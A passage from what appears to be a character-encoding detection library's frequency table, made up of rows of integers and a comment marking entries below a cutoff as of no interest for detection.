4278,4901,4252, 41,1150,3747,2572,2227,4501,3658,4902,3813,3357,3617,2884,2258,
887, 538,4187,3199,1294,2439,3042,2329,2343,2497,1255, 107, 543,1527, 521,3478,
3568, 194,5062, 15, 961,3870,1241,1192,2664, 66,5215,3260,2111,1295,1127,2152,
3805,4135, 901,1164,1976, 398,1278, 530,1460, 748, 904,1054,1966,1426, 53,2909,
509, 523,2279,1534, 536,1019, 239,1685, 460,2353, 673,1065,2401,3600,4298,2272,
1272,2363, 284,1753,3679,4064,1695, 81, 815,2677,2757,2731,1386, 859, 500,4221,
2190,2566, 757,1006,2519,2068,1166,1455, 337,2654,3203,1863,1682,1914,3025,1252,
1409,1366, 847, 714,2834,2038,3209, 964,2970,1901, 885,2553,1078,1756,3049, 301,
1572,3326, 688,2130,1996,2429,1805,1648,2930,3421,2750,3652,3088, 262,1158,1254,
389,1641,1812, 526,1719, 923,2073,1073,1902, 468, 489,4625,1140, 857,2375,3070,
3319,2863, 380, 116,1328,2693,1161,2244, 273,1212,1884,2769,3011,1775,1142, 461,
3066,1200,2147,2212, 790, 702,2695,4222,1601,1058, 434,2338,5153,3640, 67,2360,
4099,2502, 618,3472,1329, 416,1132, 830,2782,1807,2653,3211,3510,1662, 192,2124,
296,3979,1739,1611,3684, 23, 118, 324, 446,1239,1225, 293,2520,3814,3795,2535,
3116, 17,1074, 467,2692,2201, 387,2922, 45,1326,3055,1645,3659,2817, 958, 243,
1903,2320,1339,2825,1784,3289, 356, 576, 865,2315,2381,3377,3916,1088,3122,1713,
1655, 935, 628,4689,1034,1327, 441, 800, 720, 894,1979,2183,1528,5289,2702,1071,
4046,3572,2399,1571,3281, 79, 761,1103, 327, 134, 758,1899,1371,1615, 879, 442,
215,2605,2579, 173,2048,2485,1057,2975,3317,1097,2253,3801,4263,1403,1650,2946,
814,4968,3487,1548,2644,1567,1285, 2, 295,2636, 97, 946,3576, 832, 141,4257,
3273, 760,3821,3521,3156,2607, 949,1024,1733,1516,1803,1920,2125,2283,2665,3180,
1501,2064,3560,2171,1592, 803,3518,1416, 732,3897,4258,1363,1362,2458, 119,1427,
602,1525,2608,1605,1639,3175, 694,3064, 10, 465, 76,2000,4846,4208, 444,3781,
1619,3353,2206,1273,3796, 740,2483, 320,1723,2377,3660,2619,1359,1137,1762,1724,
2345,2842,1850,1862, 912, 821,1866, 612,2625,1735,2573,3369,1093, 844, 89, 937,
930,1424,3564,2413,2972,1004,3046,3019,2011, 711,3171,1452,4178, 428, 801,1943,
432, 445,2811, 206,4136,1472, 730, 349, 73, 397,2802,2547, 998,1637,1167, 789,
396,3217, 154,1218, 716,1120,1780,2819,4826,1931,3334,3762,2139,1215,2627, 552,
3664,3628,3232,1405,2383,3111,1356,2652,3577,3320,3101,1703, 640,1045,1370,1246,
4996, 371,1575,2436,1621,2210, 984,4033,1734,2638, 16,4529, 663,2755,3255,1451,
3917,2257,1253,1955,2234,1263,2951, 214,1229, 617, 485, 359,1831,1969, 473,2310,
750,2058, 165, 80,2864,2419, 361,4344,2416,2479,1134, 796,3726,1266,2943, 860,
2715, 938, 390,2734,1313,1384, 248, 202, 877,1064,2854, 522,3907, 279,1602, 297,
2357, 395,3740, 137,2075, 944,4089,2584,1267,3802, 62,1533,2285, 178, 176, 780,
2440, 201,3707, 590, 478,1560,4354,2117,1075, 30, 74,4643,4004,1635,1441,2745,
776,2596, 238,1077,1692,1912,2844, 605, 499,1742,3947, 241,3053, 980,1749, 936,
2640,4511,2582, 515,1543,2162,5322,2892,2993, 890,2148,1924, 665,1827,3581,1032,
968,3163, 339,1044,1896, 270, 583,1791,1720,4367,1194,3488,3669, 43,2523,1657,
163,2167, 290,1209,1622,3378, 550, 634,2508,2510, 695,2634,2384,2512,1476,1414,
220,1469,2341,2138,2852,3183,2900,4939,2865,3502,1211,3680, 854,3227,1299,2976,
3172, 186,2998,1459, 443,1067,3251,1495, 321,1932,3054, 909, 753,1410,1828, 436,
2441,1119,1587,3164,2186,1258, 227, 231,1425,1890,3200,3942, 247, 959, 725,5254,
2741, 577,2158,2079, 929, 120, 174, 838,2813, 591,1115, 417,2024, 40,3240,1536,
1037, 291,4151,2354, 632,1298,2406,2500,3535,1825,1846,3451, 205,1171, 345,4238,
18,1163, 811, 685,2208,1217, 425,1312,1508,1175,4308,2552,1033, 587,1381,3059,
2984,3482, 340,1316,4023,3972, 792,3176, 519, 777,4690, 918, 933,4130,2981,3741,
90,3360,2911,2200,5184,4550, 609,3079,2030, 272,3379,2736, 363,3881,1130,1447,
286, 779, 357,1169,3350,3137,1630,1220,2687,2391, 747,1277,3688,2618,2682,2601,
1156,3196,5290,4034,3102,1689,3596,3128, 874, 219,2783, 798, 508,1843,2461, 269,
1658,1776,1392,1913,2983,3287,2866,2159,2372, 829,4076, 46,4253,2873,1889,1894,
915,1834,1631,2181,2318, 298, 664,2818,3555,2735, 954,3228,3117, 527,3511,2173,
681,2712,3033,2247,2346,3467,1652, 155,2164,3382, 113,1994, 450, 899, 494, 994,
1237,2958,1875,2336,1926,3727, 545,1577,1550, 633,3473, 204,1305,3072,2410,1956,
2471, 707,2134, 841,2195,2196,2663,3843,1026,4940, 990,3252,4997, 368,1092, 437,
3212,3258,1933,1829, 675,2977,2893, 412, 943,3723,4644,3294,3283,2230,2373,5154,
2389,2241,2661,2323,1404,2524, 593, 787, 677,3008,1275,2059, 438,2709,2609,2240,
2269,2246,1446, 36,1568,1373,3892,1574,2301,1456,3962, 693,2276,5216,2035,1143,
2720,1919,1797,1811,2763,4137,2597,1830,1699,1488,1198,2090, 424,1694, 312,3634,
3390,4179,3335,2252,1214, 561,1059,3243,2295,2561, 975,5155,2321,2751,3772, 472,
1537,3282,3398,1047,2077,2348,2878,1323,3340,3076, 690,2906, 51, 369, 170,3541,
1060,2187,2688,3670,2541,1083,1683, 928,3918, 459, 109,4427, 599,3744,4286, 143,
2101,2730,2490, 82,1588,3036,2121, 281,1860, 477,4035,1238,2812,3020,2716,3312,
1530,2188,2055,1317, 843, 636,1808,1173,3495, 649, 181,1002, 147,3641,1159,2414,
3750,2289,2795, 813,3123,2610,1136,4368, 5,3391,4541,2174, 420, 429,1728, 754,
1228,2115,2219, 347,2223,2733, 735,1518,3003,2355,3134,1764,3948,3329,1888,2424,
1001,1234,1972,3321,3363,1672,1021,1450,1584, 226, 765, 655,2526,3404,3244,2302,
3665, 731, 594,2184, 319,1576, 621, 658,2656,4299,2099,3864,1279,2071,2598,2739,
795,3086,3699,3908,1707,2352,2402,1382,3136,2475,1465,4847,3496,3865,1085,3004,
2591,1084, 213,2287,1963,3565,2250, 822, 793,4574,3187,1772,1789,3050, 595,1484,
1959,2770,1080,2650, 456, 422,2996, 940,3322,4328,4345,3092,2742, 965,2784, 739,
4124, 952,1358,2498,2949,2565, 332,2698,2378, 660,2260,2473,4194,3856,2919, 535,
1260,2651,1208,1428,1300,1949,1303,2942, 433,2455,2450,1251,1946, 614,1269, 641,
1306,1810,2737,3078,2912, 564,2365,1419,1415,1497,4460,2367,2185,1379,3005,1307,
3218,2175,1897,3063, 682,1157,4040,4005,1712,1160,1941,1399, 394, 402,2952,1573,
1151,2986,2404, 862, 299,2033,1489,3006, 346, 171,2886,3401,1726,2932, 168,2533,
47,2507,1030,3735,1145,3370,1395,1318,1579,3609,4560,2857,4116,1457,2529,1965,
504,1036,2690,2988,2405, 745,5871, 849,2397,2056,3081, 863,2359,3857,2096, 99,
1397,1769,2300,4428,1643,3455,1978,1757,3718,1440, 35,4879,3742,1296,4228,2280,
160,5063,1599,2013, 166, 520,3479,1646,3345,3012, 490,1937,1545,1264,2182,2505,
1096,1188,1369,1436,2421,1667,2792,2460,1270,2122, 727,3167,2143, 806,1706,1012,
1800,3037, 960,2218,1882, 805, 139,2456,1139,1521, 851,1052,3093,3089, 342,2039,
744,5097,1468,1502,1585,2087, 223, 939, 326,2140,2577, 892,2481,1623,4077, 982,
3708, 135,2131, 87,2503,3114,2326,1106, 876,1616, 547,2997,2831,2093,3441,4530,
4314, 9,3256,4229,4148, 659,1462,1986,1710,2046,2913,2231,4090,4880,5255,3392,
3274,1368,3689,4645,1477, 705,3384,3635,1068,1529,2941,1458,3782,1509, 100,1656,
2548, 718,2339, 408,1590,2780,3548,1838,4117,3719,1345,3530, 717,3442,2778,3220,
2898,1892,4590,3614,3371,2043,1998,1224,3483, 891, 635, 584,2559,3355, 733,1766,
1729,1172,3789,1891,2307, 781,2982,2271,1957,1580,5773,2633,2005,4195,3097,1535,
3213,1189,1934,5693,3262, 586,3118,1324,1598, 517,1564,2217,1868,1893,4445,3728,
2703,3139,1526,1787,1992,3882,2875,1549,1199,1056,2224,1904,2711,5098,4287, 338,
1993,3129,3489,2689,1809,2815,1997, 957,1855,3898,2550,3275,3057,1105,1319, 627,
1505,1911,1883,3526, 698,3629,3456,1833,1431, 746, 77,1261,2017,2296,1977,1885,
125,1334,1600, 525,1798,1109,2222,1470,1945, 559,2236,1186,3443,2476,1929,1411,
2411,3135,1777,3372,2621,1841,1613,3229, 668,1430,1839,2643,2916, 195,1989,2671,
2358,1387, 629,3205,2293,5256,4439, 123,1310, 888,1879,4300,3021,3605,1003,1162,
3192,2910,2010, 140,2395,2859, 55,1082,2012,2901, 662, 419,2081,1438, 680,2774,
4654,3912,1620,1731,1625,5035,4065,2328, 512,1344, 802,5443,2163,2311,2537, 524,
3399, 98,1155,2103,1918,2606,3925,2816,1393,2465,1504,3773,2177,3963,1478,4346,
180,1113,4655,3461,2028,1698, 833,2696,1235,1322,1594,4408,3623,3013,3225,2040,
3022, 541,2881, 607,3632,2029,1665,1219, 639,1385,1686,1099,2803,3231,1938,3188,
2858, 427, 676,2772,1168,2025, 454,3253,2486,3556, 230,1950, 580, 791,1991,1280,
1086,1974,2034, 630, 257,3338,2788,4903,1017, 86,4790, 966,2789,1995,1696,1131,
259,3095,4188,1308, 179,1463,5257, 289,4107,1248, 42,3413,1725,2288, 896,1947,
774,4474,4254, 604,3430,4264, 392,2514,2588, 452, 237,1408,3018, 988,4531,1970,
3034,3310, 540,2370,1562,1288,2990, 502,4765,1147, 4,1853,2708, 207, 294,2814,
4078,2902,2509, 684, 34,3105,3532,2551, 644, 709,2801,2344, 573,1727,3573,3557,
2021,1081,3100,4315,2100,3681, 199,2263,1837,2385, 146,3484,1195,2776,3949, 997,
1939,3973,1008,1091,1202,1962,1847,1149,4209,5444,1076, 493, 117,5400,2521, 972,
1490,2934,1796,4542,2374,1512,2933,2657, 413,2888,1135,2762,2314,2156,1355,2369,
766,2007,2527,2170,3124,2491,2593,2632,4757,2437, 234,3125,3591,1898,1750,1376,
1942,3468,3138, 570,2127,2145,3276,4131, 962, 132,1445,4196, 19, 941,3624,3480,
3366,1973,1374,4461,3431,2629, 283,2415,2275, 808,2887,3620,2112,2563,1353,3610,
955,1089,3103,1053, 96, 88,4097, 823,3808,1583, 399, 292,4091,3313, 421,1128,
642,4006, 903,2539,1877,2082, 596, 29,4066,1790, 722,2157, 130, 995,1569, 769,
1485, 464, 513,2213, 288,1923,1101,2453,4316, 133, 486,2445, 50, 625, 487,2207,
57, 423, 481,2962, 159,3729,1558, 491, 303, 482, 501, 240,2837, 112,3648,2392,
1783, 362, 8,3433,3422, 610,2793,3277,1390,1284,1654, 21,3823, 734, 367, 623,
193, 287, 374,1009,1483, 816, 476, 313,2255,2340,1262,2150,2899,1146,2581, 782,
2116,1659,2018,1880, 255,3586,3314,1110,2867,2137,2564, 986,2767,5185,2006, 650,
158, 926, 762, 881,3157,2717,2362,3587, 306,3690,3245,1542,3077,2427,1691,2478,
2118,2985,3490,2438, 539,2305, 983, 129,1754, 355,4201,2386, 827,2923, 104,1773,
2838,2771, 411,2905,3919, 376, 767, 122,1114, 828,2422,1817,3506, 266,3460,1007,
1609,4998, 945,2612,4429,2274, 726,1247,1964,2914,2199,2070,4002,4108, 657,3323,
1422, 579, 455,2764,4737,1222,2895,1670, 824,1223,1487,2525, 558, 861,3080, 598,
2659,2515,1967, 752,2583,2376,2214,4180, 977, 704,2464,4999,2622,4109,1210,2961,
819,1541, 142,2284, 44, 418, 457,1126,3730,4347,4626,1644,1876,3671,1864, 302,
1063,5694, 624, 723,1984,3745,1314,1676,2488,1610,1449,3558,3569,2166,2098, 409,
1011,2325,3704,2306, 818,1732,1383,1824,1844,3757, 999,2705,3497,1216,1423,2683,
2426,2954,2501,2726,2229,1475,2554,5064,1971,1794,1666,2014,1343, 783, 724, 191,
2434,1354,2220,5065,1763,2752,2472,4152, 131, 175,2885,3434, 92,1466,4920,2616,
3871,3872,3866, 128,1551,1632, 669,1854,3682,4691,4125,1230, 188,2973,3290,1302,
1213, 560,3266, 917, 763,3909,3249,1760, 868,1958, 764,1782,2097, 145,2277,3774,
4462, 64,1491,3062, 971,2132,3606,2442, 221,1226,1617, 218, 323,1185,3207,3147,
571, 619,1473,1005,1744,2281, 449,1887,2396,3685, 275, 375,3816,1743,3844,3731,
845,1983,2350,4210,1377, 773, 967,3499,3052,3743,2725,4007,1697,1022,3943,1464,
3264,2855,2722,1952,1029,2839,2467, 84,4383,2215, 820,1391,2015,2448,3672, 377,
1948,2168, 797,2545,3536,2578,2645, 94,2874,1678, 405,1259,3071, 771, 546,1315,
470,1243,3083, 895,2468, 981, 969,2037, 846,4181, 653,1276,2928, 14,2594, 557,
3007,2474, 156, 902,1338,1740,2574, 537,2518, 973,2282,2216,2433,1928, 138,2903,
1293,2631,1612, 646,3457, 839,2935, 111, 496,2191,2847, 589,3186, 149,3994,2060,
4031,2641,4067,3145,1870, 37,3597,2136,1025,2051,3009,3383,3549,1121,1016,3261,
1301, 251,2446,2599,2153, 872,3246, 637, 334,3705, 831, 884, 921,3065,3140,4092,
2198,1944, 246,2964, 108,2045,1152,1921,2308,1031, 203,3173,4170,1907,3890, 810,
1401,2003,1690, 506, 647,1242,2828,1761,1649,3208,2249,1589,3709,2931,5156,1708,
498, 666,2613, 834,3817,1231, 184,2851,1124, 883,3197,2261,3710,1765,1553,2658,
1178,2639,2351, 93,1193, 942,2538,2141,4402, 235,1821, 870,1591,2192,1709,1871,
3341,1618,4126,2595,2334, 603, 651, 69, 701, 268,2662,3411,2555,1380,1606, 503,
448, 254,2371,2646, 574,1187,2309,1770, 322,2235,1292,1801, 305, 566,1133, 229,
2067,2057, 706, 167, 483,2002,2672,3295,1820,3561,3067, 316, 378,2746,3452,1112,
136,1981, 507,1651,2917,1117, 285,4591, 182,2580,3522,1304, 335,3303,1835,2504,
1795,1792,2248, 674,1018,2106,2449,1857,2292,2845, 976,3047,1781,2600,2727,1389,
1281, 52,3152, 153, 265,3950, 672,3485,3951,4463, 430,1183, 365, 278,2169, 27,
1407,1336,2304, 209,1340,1730,2202,1852,2403,2883, 979,1737,1062, 631,2829,2542,
3876,2592, 825,2086,2226,3048,3625, 352,1417,3724, 542, 991, 431,1351,3938,1861,
2294, 826,1361,2927,3142,3503,1738, 463,2462,2723, 582,1916,1595,2808, 400,3845,
3891,2868,3621,2254, 58,2492,1123, 910,2160,2614,1372,1603,1196,1072,3385,1700,
3267,1980, 696, 480,2430, 920, 799,1570,2920,1951,2041,4047,2540,1321,4223,2469,
3562,2228,1271,2602, 401,2833,3351,2575,5157, 907,2312,1256, 410, 263,3507,1582,
996, 678,1849,2316,1480, 908,3545,2237, 703,2322, 667,1826,2849,1531,2604,2999,
2407,3146,2151,2630,1786,3711, 469,3542, 497,3899,2409, 858, 837,4446,3393,1274,
786, 620,1845,2001,3311, 484, 308,3367,1204,1815,3691,2332,1532,2557,1842,2020,
2724,1927,2333,4440, 567, 22,1673,2728,4475,1987,1858,1144,1597, 101,1832,3601,
12, 974,3783,4391, 951,1412, 1,3720, 453,4608,4041, 528,1041,1027,3230,2628,
1129, 875,1051,3291,1203,2262,1069,2860,2799,2149,2615,3278, 144,1758,3040, 31,
475,1680, 366,2685,3184, 311,1642,4008,2466,5036,1593,1493,2809, 216,1420,1668,
233, 304,2128,3284, 232,1429,1768,1040,2008,3407,2740,2967,2543, 242,2133, 778,
1565,2022,2620, 505,2189,2756,1098,2273, 372,1614, 708, 553,2846,2094,2278, 169,
3626,2835,4161, 228,2674,3165, 809,1454,1309, 466,1705,1095, 900,3423, 880,2667,
3751,5258,2317,3109,2571,4317,2766,1503,1342, 866,4447,1118, 63,2076, 314,1881,
1348,1061, 172, 978,3515,1747, 532, 511,3970, 6, 601, 905,2699,3300,1751, 276,
1467,3725,2668, 65,4239,2544,2779,2556,1604, 578,2451,1802, 992,2331,2624,1320,
3446, 713,1513,1013, 103,2786,2447,1661, 886,1702, 916, 654,3574,2031,1556, 751,
2178,2821,2179,1498,1538,2176, 271, 914,2251,2080,1325, 638,1953,2937,3877,2432,
2754, 95,3265,1716, 260,1227,4083, 775, 106,1357,3254, 426,1607, 555,2480, 772,
1985, 244,2546, 474, 495,1046,2611,1851,2061, 71,2089,1675,2590, 742,3758,2843,
3222,1433, 267,2180,2576,2826,2233,2092,3913,2435, 956,1745,3075, 856,2113,1116,
451, 3,1988,2896,1398, 993,2463,1878,2049,1341,2718,2721,2870,2108, 712,2904,
4363,2753,2324, 277,2872,2349,2649, 384, 987, 435, 691,3000, 922, 164,3939, 652,
1500,1184,4153,2482,3373,2165,4848,2335,3775,3508,3154,2806,2830,1554,2102,1664,
2530,1434,2408, 893,1547,2623,3447,2832,2242,2532,3169,2856,3223,2078, 49,3770,
3469, 462, 318, 656,2259,3250,3069, 679,1629,2758, 344,1138,1104,3120,1836,1283,
3115,2154,1437,4448, 934, 759,1999, 794,2862,1038, 533,2560,1722,2342, 855,2626,
1197,1663,4476,3127, 85,4240,2528, 25,1111,1181,3673, 407,3470,4561,2679,2713,
768,1925,2841,3986,1544,1165, 932, 373,1240,2146,1930,2673, 721,4766, 354,4333,
391,2963, 187, 61,3364,1442,1102, 330,1940,1767, 341,3809,4118, 393,2496,2062,
2211, 105, 331, 300, 439, 913,1332, 626, 379,3304,1557, 328, 689,3952, 309,1555,
931, 317,2517,3027, 325, 569, 686,2107,3084, 60,1042,1333,2794, 264,3177,4014,
1628, 258,3712, 7,4464,1176,1043,1778, 683, 114,1975, 78,1492, 383,1886, 510,
386, 645,5291,2891,2069,3305,4138,3867,2939,2603,2493,1935,1066,1848,3588,1015,
1282,1289,4609, 697,1453,3044,2666,3611,1856,2412, 54, 719,1330, 568,3778,2459,
1748, 788, 492, 551,1191,1000, 488,3394,3763, 282,1799, 348,2016,1523,3155,2390,
1049, 382,2019,1788,1170, 729,2968,3523, 897,3926,2785,2938,3292, 350,2319,3238,
1718,1717,2655,3453,3143,4465, 161,2889,2980,2009,1421, 56,1908,1640,2387,2232,
1917,1874,2477,4921, 148, 83,3438, 592,4245,2882,1822,1055, 741, 115,1496,1624,
381,1638,4592,1020, 516,3214, 458, 947,4575,1432, 211,1514,2926,1865,2142, 189,
852,1221,1400,1486, 882,2299,4036, 351, 28,1122, 700,6479,6480,6481,6482,6483, # last 512
#Everything below is of no interest for detection purpose
5508,6484,3900,3414,3974,4441,4024,3537,4037,5628,5099,3633,6485,3148,6486,3636,
5509,3257,5510,5973,5445,5872,4941,4403,3174,4627,5873,6276,2286,4230,5446,5874,
5122,6102,6103,4162,5447,5123,5323,4849,6277,3980,3851,5066,4246,5774,5067,6278,
3001,2807,5695,3346,5775,5974,5158,5448,6487,5975,5976,5776,3598,6279,5696,4806,
4211,4154,6280,6488,6489,6490,6281,4212,5037,3374,4171,6491,4562,4807,4722,4827,
5977,6104,4532,4079,5159,5324,5160,4404,3858,5359,5875,3975,4288,4610,3486,4512,
5325,3893,5360,6282,6283,5560,2522,4231,5978,5186,5449,2569,3878,6284,5401,3578,
4415,6285,4656,5124,5979,2506,4247,4449,3219,3417,4334,4969,4329,6492,4576,4828,
4172,4416,4829,5402,6286,3927,3852,5361,4369,4830,4477,4867,5876,4173,6493,6105,
4657,6287,6106,5877,5450,6494,4155,4868,5451,3700,5629,4384,6288,6289,5878,3189,
4881,6107,6290,6495,4513,6496,4692,4515,4723,5100,3356,6497,6291,3810,4080,5561,
3570,4430,5980,6498,4355,5697,6499,4724,6108,6109,3764,4050,5038,5879,4093,3226,
6292,5068,5217,4693,3342,5630,3504,4831,4377,4466,4309,5698,4431,5777,6293,5778,
4272,3706,6110,5326,3752,4676,5327,4273,5403,4767,5631,6500,5699,5880,3475,5039,
6294,5562,5125,4348,4301,4482,4068,5126,4593,5700,3380,3462,5981,5563,3824,5404,
4970,5511,3825,4738,6295,6501,5452,4516,6111,5881,5564,6502,6296,5982,6503,4213,
4163,3454,6504,6112,4009,4450,6113,4658,6297,6114,3035,6505,6115,3995,4904,4739,
4563,4942,4110,5040,3661,3928,5362,3674,6506,5292,3612,4791,5565,4149,5983,5328,
5259,5021,4725,4577,4564,4517,4364,6298,5405,4578,5260,4594,4156,4157,5453,3592,
3491,6507,5127,5512,4709,4922,5984,5701,4726,4289,6508,4015,6116,5128,4628,3424,
4241,5779,6299,4905,6509,6510,5454,5702,5780,6300,4365,4923,3971,6511,5161,3270,
3158,5985,4100, 867,5129,5703,6117,5363,3695,3301,5513,4467,6118,6512,5455,4232,
4242,4629,6513,3959,4478,6514,5514,5329,5986,4850,5162,5566,3846,4694,6119,5456,
4869,5781,3779,6301,5704,5987,5515,4710,6302,5882,6120,4392,5364,5705,6515,6121,
6516,6517,3736,5988,5457,5989,4695,2457,5883,4551,5782,6303,6304,6305,5130,4971,
6122,5163,6123,4870,3263,5365,3150,4871,6518,6306,5783,5069,5706,3513,3498,4409,
5330,5632,5366,5458,5459,3991,5990,4502,3324,5991,5784,3696,4518,5633,4119,6519,
4630,5634,4417,5707,4832,5992,3418,6124,5993,5567,4768,5218,6520,4595,3458,5367,
6125,5635,6126,4202,6521,4740,4924,6307,3981,4069,4385,6308,3883,2675,4051,3834,
4302,4483,5568,5994,4972,4101,5368,6309,5164,5884,3922,6127,6522,6523,5261,5460,
5187,4164,5219,3538,5516,4111,3524,5995,6310,6311,5369,3181,3386,2484,5188,3464,
5569,3627,5708,6524,5406,5165,4677,4492,6312,4872,4851,5885,4468,5996,6313,5709,
5710,6128,2470,5886,6314,5293,4882,5785,3325,5461,5101,6129,5711,5786,6525,4906,
6526,6527,4418,5887,5712,4808,2907,3701,5713,5888,6528,3765,5636,5331,6529,6530,
3593,5889,3637,4943,3692,5714,5787,4925,6315,6130,5462,4405,6131,6132,6316,5262,
6531,6532,5715,3859,5716,5070,4696,5102,3929,5788,3987,4792,5997,6533,6534,3920,
4809,5000,5998,6535,2974,5370,6317,5189,5263,5717,3826,6536,3953,5001,4883,3190,
5463,5890,4973,5999,4741,6133,6134,3607,5570,6000,4711,3362,3630,4552,5041,6318,
6001,2950,2953,5637,4646,5371,4944,6002,2044,4120,3429,6319,6537,5103,4833,6538,
6539,4884,4647,3884,6003,6004,4758,3835,5220,5789,4565,5407,6540,6135,5294,4697,
4852,6320,6321,3206,4907,6541,6322,4945,6542,6136,6543,6323,6005,4631,3519,6544,
5891,6545,5464,3784,5221,6546,5571,4659,6547,6324,6137,5190,6548,3853,6549,4016,
4834,3954,6138,5332,3827,4017,3210,3546,4469,5408,5718,3505,4648,5790,5131,5638,
5791,5465,4727,4318,6325,6326,5792,4553,4010,4698,3439,4974,3638,4335,3085,6006,
5104,5042,5166,5892,5572,6327,4356,4519,5222,5573,5333,5793,5043,6550,5639,5071,
4503,6328,6139,6551,6140,3914,3901,5372,6007,5640,4728,4793,3976,3836,4885,6552,
4127,6553,4451,4102,5002,6554,3686,5105,6555,5191,5072,5295,4611,5794,5296,6556,
5893,5264,5894,4975,5466,5265,4699,4976,4370,4056,3492,5044,4886,6557,5795,4432,
4769,4357,5467,3940,4660,4290,6141,4484,4770,4661,3992,6329,4025,4662,5022,4632,
4835,4070,5297,4663,4596,5574,5132,5409,5895,6142,4504,5192,4664,5796,5896,3885,
5575,5797,5023,4810,5798,3732,5223,4712,5298,4084,5334,5468,6143,4052,4053,4336,
4977,4794,6558,5335,4908,5576,5224,4233,5024,4128,5469,5225,4873,6008,5045,4729,
4742,4633,3675,4597,6559,5897,5133,5577,5003,5641,5719,6330,6560,3017,2382,3854,
4406,4811,6331,4393,3964,4946,6561,2420,3722,6562,4926,4378,3247,1736,4442,6332,
5134,6333,5226,3996,2918,5470,4319,4003,4598,4743,4744,4485,3785,3902,5167,5004,
5373,4394,5898,6144,4874,1793,3997,6334,4085,4214,5106,5642,4909,5799,6009,4419,
4189,3330,5899,4165,4420,5299,5720,5227,3347,6145,4081,6335,2876,3930,6146,3293,
3786,3910,3998,5900,5300,5578,2840,6563,5901,5579,6147,3531,5374,6564,6565,5580,
4759,5375,6566,6148,3559,5643,6336,6010,5517,6337,6338,5721,5902,3873,6011,6339,
6567,5518,3868,3649,5722,6568,4771,4947,6569,6149,4812,6570,2853,5471,6340,6341,
5644,4795,6342,6012,5723,6343,5724,6013,4349,6344,3160,6150,5193,4599,4514,4493,
5168,4320,6345,4927,3666,4745,5169,5903,5005,4928,6346,5725,6014,4730,4203,5046,
4948,3395,5170,6015,4150,6016,5726,5519,6347,5047,3550,6151,6348,4197,4310,5904,
6571,5581,2965,6152,4978,3960,4291,5135,6572,5301,5727,4129,4026,5905,4853,5728,
5472,6153,6349,4533,2700,4505,5336,4678,3583,5073,2994,4486,3043,4554,5520,6350,
6017,5800,4487,6351,3931,4103,5376,6352,4011,4321,4311,4190,5136,6018,3988,3233,
4350,5906,5645,4198,6573,5107,3432,4191,3435,5582,6574,4139,5410,6353,5411,3944,
5583,5074,3198,6575,6354,4358,6576,5302,4600,5584,5194,5412,6577,6578,5585,5413,
5303,4248,5414,3879,4433,6579,4479,5025,4854,5415,6355,4760,4772,3683,2978,4700,
3797,4452,3965,3932,3721,4910,5801,6580,5195,3551,5907,3221,3471,3029,6019,3999,
5908,5909,5266,5267,3444,3023,3828,3170,4796,5646,4979,4259,6356,5647,5337,3694,
6357,5648,5338,4520,4322,5802,3031,3759,4071,6020,5586,4836,4386,5048,6581,3571,
4679,4174,4949,6154,4813,3787,3402,3822,3958,3215,3552,5268,4387,3933,4950,4359,
6021,5910,5075,3579,6358,4234,4566,5521,6359,3613,5049,6022,5911,3375,3702,3178,
4911,5339,4521,6582,6583,4395,3087,3811,5377,6023,6360,6155,4027,5171,5649,4421,
4249,2804,6584,2270,6585,4000,4235,3045,6156,5137,5729,4140,4312,3886,6361,4330,
6157,4215,6158,3500,3676,4929,4331,3713,4930,5912,4265,3776,3368,5587,4470,4855,
3038,4980,3631,6159,6160,4132,4680,6161,6362,3923,4379,5588,4255,6586,4121,6587,
6363,4649,6364,3288,4773,4774,6162,6024,6365,3543,6588,4274,3107,3737,5050,5803,
4797,4522,5589,5051,5730,3714,4887,5378,4001,4523,6163,5026,5522,4701,4175,2791,
3760,6589,5473,4224,4133,3847,4814,4815,4775,3259,5416,6590,2738,6164,6025,5304,
3733,5076,5650,4816,5590,6591,6165,6592,3934,5269,6593,3396,5340,6594,5804,3445,
3602,4042,4488,5731,5732,3525,5591,4601,5196,6166,6026,5172,3642,4612,3202,4506,
4798,6366,3818,5108,4303,5138,5139,4776,3332,4304,2915,3415,4434,5077,5109,4856,
2879,5305,4817,6595,5913,3104,3144,3903,4634,5341,3133,5110,5651,5805,6167,4057,
5592,2945,4371,5593,6596,3474,4182,6367,6597,6168,4507,4279,6598,2822,6599,4777,
4713,5594,3829,6169,3887,5417,6170,3653,5474,6368,4216,2971,5228,3790,4579,6369,
5733,6600,6601,4951,4746,4555,6602,5418,5475,6027,3400,4665,5806,6171,4799,6028,
5052,6172,3343,4800,4747,5006,6370,4556,4217,5476,4396,5229,5379,5477,3839,5914,
5652,5807,4714,3068,4635,5808,6173,5342,4192,5078,5419,5523,5734,6174,4557,6175,
4602,6371,6176,6603,5809,6372,5735,4260,3869,5111,5230,6029,5112,6177,3126,4681,
5524,5915,2706,3563,4748,3130,6178,4018,5525,6604,6605,5478,4012,4837,6606,4534,
4193,5810,4857,3615,5479,6030,4082,3697,3539,4086,5270,3662,4508,4931,5916,4912,
5811,5027,3888,6607,4397,3527,3302,3798,2775,2921,2637,3966,4122,4388,4028,4054,
1633,4858,5079,3024,5007,3982,3412,5736,6608,3426,3236,5595,3030,6179,3427,3336,
3279,3110,6373,3874,3039,5080,5917,5140,4489,3119,6374,5812,3405,4494,6031,4666,
4141,6180,4166,6032,5813,4981,6609,5081,4422,4982,4112,3915,5653,3296,3983,6375,
4266,4410,5654,6610,6181,3436,5082,6611,5380,6033,3819,5596,4535,5231,5306,5113,
6612,4952,5918,4275,3113,6613,6376,6182,6183,5814,3073,4731,4838,5008,3831,6614,
4888,3090,3848,4280,5526,5232,3014,5655,5009,5737,5420,5527,6615,5815,5343,5173,
5381,4818,6616,3151,4953,6617,5738,2796,3204,4360,2989,4281,5739,5174,5421,5197,
3132,5141,3849,5142,5528,5083,3799,3904,4839,5480,2880,4495,3448,6377,6184,5271,
5919,3771,3193,6034,6035,5920,5010,6036,5597,6037,6378,6038,3106,5422,6618,5423,
5424,4142,6619,4889,5084,4890,4313,5740,6620,3437,5175,5307,5816,4199,5198,5529,
5817,5199,5656,4913,5028,5344,3850,6185,2955,5272,5011,5818,4567,4580,5029,5921,
3616,5233,6621,6622,6186,4176,6039,6379,6380,3352,5200,5273,2908,5598,5234,3837,
5308,6623,6624,5819,4496,4323,5309,5201,6625,6626,4983,3194,3838,4167,5530,5922,
5274,6381,6382,3860,3861,5599,3333,4292,4509,6383,3553,5481,5820,5531,4778,6187,
3955,3956,4324,4389,4218,3945,4325,3397,2681,5923,4779,5085,4019,5482,4891,5382,
5383,6040,4682,3425,5275,4094,6627,5310,3015,5483,5657,4398,5924,3168,4819,6628,
